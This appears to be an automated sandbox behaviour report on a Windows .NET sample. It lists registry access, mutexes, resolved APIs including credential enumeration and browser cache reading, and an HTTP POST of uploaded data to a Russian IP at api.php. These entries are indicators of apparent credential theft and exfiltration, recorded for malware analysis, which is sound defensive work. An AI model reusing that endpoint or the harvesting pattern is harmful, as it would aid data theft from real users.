HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6f06001f\475dce40\84\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.EnterpriseServices,2.0.0.0,,b03f5f7f11d50a3a,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualC,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Transactions,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\InstallationType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\a_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\a_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\a_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\a_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\a_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\a_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\Library
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\IsMultiInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\First Counter
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\CategoryOptions
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\FileMappingSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\Counter Names
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\FinalizerActivityBypass
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles

Write Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\a_RASAPI32
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\a_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\a_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\a_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\a_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\a_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\a_RASAPI32\FileDirectory

Delete Keys

Nothing to display

Mutexes

Global\CLR_CASOFF_MUTEX
Local\_!MSFTHISTORY!_
Local\c:!users!seven01!appdata!local!microsoft!windows!temporary internet files!content.ie5!
Local\c:!users!seven01!appdata!roaming!microsoft!windows!cookies!
Local\c:!users!seven01!appdata!local!microsoft!windows!history!history.ie5!
DBWinMutex
Global\.net clr networking

Resolved APIs

advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
kernel32.dll.FlsAlloc
kernel32.dll.FlsFree
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.SetThreadStackGuarantee
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.GetLogicalProcessorInformation
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.EnumSystemLocalesEx
kernel32.dll.CompareStringEx
kernel32.dll.GetDateFormatEx
kernel32.dll.GetLocaleInfoEx
kernel32.dll.GetTimeFormatEx
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.IsValidLocaleName
kernel32.dll.LCMapStringEx
kernel32.dll.GetTickCount64
advapi32.dll.EventRegister
mscoree.dll.#142
mscoreei.dll.RegisterShimImplCallback
mscoreei.dll.OnShimDllMainCalled
mscoreei.dll._CorExeMain
shlwapi.dll.UrlIsW
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
kernel32.dll.InitializeCriticalSectionAndSpinCount
kernel32.dll.IsProcessorFeaturePresent
msvcrt.dll._set_error_mode
msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z
kernel32.dll.FindActCtxSectionStringW
kernel32.dll.GetSystemWindowsDirectoryW
mscoree.dll.GetProcessExecutableHeap
mscoreei.dll.GetProcessExecutableHeap
mscorwks.dll._CorExeMain
mscorwks.dll.GetCLRFunction
advapi32.dll.RegisterTraceGuidsW
advapi32.dll.UnregisterTraceGuids
advapi32.dll.GetTraceLoggerHandle
advapi32.dll.GetTraceEnableLevel
advapi32.dll.GetTraceEnableFlags
advapi32.dll.TraceEvent
mscoree.dll.IEE
mscoreei.dll.IEE
mscorwks.dll.IEE
mscoree.dll.GetStartupFlags
mscoreei.dll.GetStartupFlags
mscoree.dll.GetHostConfigurationFile
mscoreei.dll.GetHostConfigurationFile
mscoreei.dll.GetCORVersion
mscoree.dll.GetCORSystemDirectory
mscoreei.dll.GetCORSystemDirectory_RetAddr
mscoreei.dll.CreateConfigStream
ntdll.dll.RtlUnwind
kernel32.dll.IsWow64Process
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.InitializeAcl
advapi32.dll.AddAccessAllowedAce
advapi32.dll.FreeSid
kernel32.dll.AddVectoredContinueHandler
kernel32.dll.RemoveVectoredContinueHandler
advapi32.dll.ConvertSidToStringSidW
shell32.dll.SHGetFolderPathW
kernel32.dll.GetWriteWatch
kernel32.dll.ResetWriteWatch
kernel32.dll.CreateMemoryResourceNotification
kernel32.dll.QueryMemoryResourceNotification
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
uxtheme.dll.ThemeInitApiHook
user32.dll.IsProcessDPIAware
kernel32.dll.QueryActCtxW
ole32.dll.CoGetContextToken
kernel32.dll.GetFullPathNameW
kernel32.dll.GetVersionExW
advapi32.dll.CryptAcquireContextA
advapi32.dll.CryptReleaseContext
advapi32.dll.CryptCreateHash
advapi32.dll.CryptDestroyHash
advapi32.dll.CryptHashData
advapi32.dll.CryptGetHashParam
advapi32.dll.CryptImportKey
advapi32.dll.CryptExportKey
advapi32.dll.CryptGenKey
advapi32.dll.CryptGetKeyParam
advapi32.dll.CryptDestroyKey
advapi32.dll.CryptVerifySignatureA
advapi32.dll.CryptSignHashA
advapi32.dll.CryptGetProvParam
advapi32.dll.CryptGetUserKey
advapi32.dll.CryptEnumProvidersA
mscoree.dll.GetMetaDataInternalInterface
mscoreei.dll.GetMetaDataInternalInterface
mscorwks.dll.GetMetaDataInternalInterface
mscorjit.dll.getJit
kernel32.dll.GetUserDefaultUILanguage
kernel32.dll.SetErrorMode
kernel32.dll.GetFileAttributesExW
bcrypt.dll.BCryptGetFipsAlgorithmMode
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptHashData
cryptsp.dll.CryptGetHashParam
cryptsp.dll.CryptDestroyHash
kernel32.dll.VirtualProtect
kernel32.dll.GlobalMemoryStatusEx
kernel32.dll.SwitchToThread
kernel32.dll.lstrlen
kernel32.dll.lstrlenW
mscoreei.dll.LoadLibraryShim
culture.dll.ConvertLangIdToCultureName
cryptsp.dll.CryptAcquireContextA
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptExportKey
cryptsp.dll.CryptDestroyKey
kernel32.dll.GetModuleHandleW
ole32.dll.CoUninitialize
shfolder.dll.SHGetFolderPathW
ole32.dll.IIDFromString
ole32.dll.CoGetClassObject
ole32.dll.CoGetObjectContext
sechost.dll.LookupAccountNameLocalW
advapi32.dll.LookupAccountSidW
sechost.dll.LookupAccountSidLocalW
cryptsp.dll.CryptGenRandom
ole32.dll.NdrOleInitializeExtension
ole32.dll.CoGetMarshalSizeMax
ole32.dll.CoMarshalInterface
ole32.dll.CoUnmarshalInterface
ole32.dll.StringFromIID
ole32.dll.CoGetPSClsid
ole32.dll.CoTaskMemAlloc
ole32.dll.CoTaskMemFree
ole32.dll.CoCreateInstance
ole32.dll.CoReleaseMarshalData
ole32.dll.DcomChannelSetHResult
rpcrtremote.dll.I_RpcExtInitializeExtensionPoint
mlang.dll.#112
wininet.dll.FindFirstUrlCacheEntryA
kernel32.dll.SetFileInformationByHandle
urlmon.dll.CreateUri
kernel32.dll.InitializeSRWLock
kernel32.dll.AcquireSRWLockExclusive
kernel32.dll.AcquireSRWLockShared
kernel32.dll.ReleaseSRWLockExclusive
kernel32.dll.ReleaseSRWLockShared
wininet.dll.FindNextUrlCacheEntryA
wininet.dll.FindCloseUrlCache
cryptsp.dll.CryptReleaseContext
advapi32.dll.CredEnumerateW
kernel32.dll.FormatMessageW
kernel32.dll.CloseHandle
kernel32.dll.GetCurrentProcess
kernel32.dll.CreateFileW
kernel32.dll.GetFileType
kernel32.dll.GetFileSize
kernel32.dll.ReadFile
mscoree.dll.ND_RI2
mscoreei.dll.ND_RI2
kernel32.dll.OutputDebugStringW
kernel32.dll.FindFirstFileW
kernel32.dll.FindClose
kernel32.dll.FindNextFileW
mscoreei.dll._CorDllMain
mscoree.dll.GetTokenForVTableEntry
mscoree.dll.SetTargetForVTableEntry
mscoree.dll.GetTargetForVTableEntry
mscoreei.dll.GetTokenForVTableEntry
mscoreei.dll.SetTargetForVTableEntry
mscoreei.dll.GetTargetForVTableEntry
kernel32.dll.GetLastError
kernel32.dll.LocalAlloc
ole32.dll.CoCreateGuid
kernel32.dll.WriteFile
kernel32.dll.UnmapViewOfFile
kernel32.dll.SetFilePointer
secur32.dll.GetUserNameExW
advapi32.dll.GetUserNameW
kernel32.dll.CreateEventW
rasapi32.dll.RasEnumConnectionsW
rtutils.dll.TraceRegisterExA
rtutils.dll.TracePrintfExA
sechost.dll.OpenSCManagerW
sechost.dll.OpenServiceW
sechost.dll.QueryServiceStatus
sechost.dll.CloseServiceHandle
ws2_32.dll.WSAStartup
ws2_32.dll.WSASocketW
ws2_32.dll.setsockopt
ws2_32.dll.WSAEventSelect
ws2_32.dll.ioctlsocket
ws2_32.dll.closesocket
kernel32.dll.GetCurrentProcessId
kernel32.dll.GetComputerNameW
advapi32.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW
kernel32.dll.LocalFree
kernel32.dll.CreateFileMappingW
kernel32.dll.MapViewOfFile
kernel32.dll.VirtualQuery
kernel32.dll.ReleaseMutex
advapi32.dll.CreateWellKnownSid
kernel32.dll.CreateMutexW
kernel32.dll.WaitForSingleObject
kernel32.dll.OpenMutexW
kernel32.dll.OpenProcess
kernel32.dll.GetProcessTimes
ws2_32.dll.WSAIoctl
rasapi32.dll.RasConnectionNotificationW
sechost.dll.NotifyServiceStatusChangeA
advapi32.dll.RegOpenCurrentUser
advapi32.dll.RegNotifyChangeKeyValue
winhttp.dll.WinHttpGetIEProxyConfigForCurrentUser
ole32.dll.CoWaitForMultipleHandles
kernel32.dll.SetEvent
kernel32.dll.ResetEvent
kernel32.dll.GetACP
ws2_32.dll.inet_addr
iphlpapi.dll.GetAdaptersAddresses
ws2_32.dll.WSAConnect
ws2_32.dll.send
ws2_32.dll.select
ws2_32.dll.WSASend
ws2_32.dll.recv
ws2_32.dll.shutdown
kernel32.dll.DeleteFileW
mscorwks.dll._CorDllMain
kernel32.dll.CreateActCtxW
kernel32.dll.AddRefActCtx
kernel32.dll.ReleaseActCtx
kernel32.dll.ActivateActCtx
kernel32.dll.DeactivateActCtx
kernel32.dll.GetCurrentActCtx
advapi32.dll.EventUnregister

Execute Commands

Nothing to display

Started Services

Nothing to display

Created Services

Nothing to display
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven01_64 Seven01_64 VirtualBox 2017-12-22 12:11:58 2017-12-22 12:14:54 176

1 HTTP Request(s) detected

http://193.124.117.153/api.php?id=1
  • Hostname: 193.124.117.153
  • IP Address:
  • Port: 80
  • Count: 1

POST /api.php?id=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------8d5497b5c3917a6
Host: 193.124.117.153
Content-Length: 5372
Expect: 100-continue
Connection: Keep-Alive

Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven01_64 Seven01_64 VirtualBox 2017-12-22 12:11:58 2017-12-22 12:14:54 176

1 Host(s) detected

IP Address Hostname Reverse DNS
193.124.117.153 Russian Federation ptr.ruvds.com.

Host(s) by Country

Hosts Country 1
1 Russian Federation Russian Federation

#infosec #automation

TheSystem Itself @ 2017-12-22 12:18:04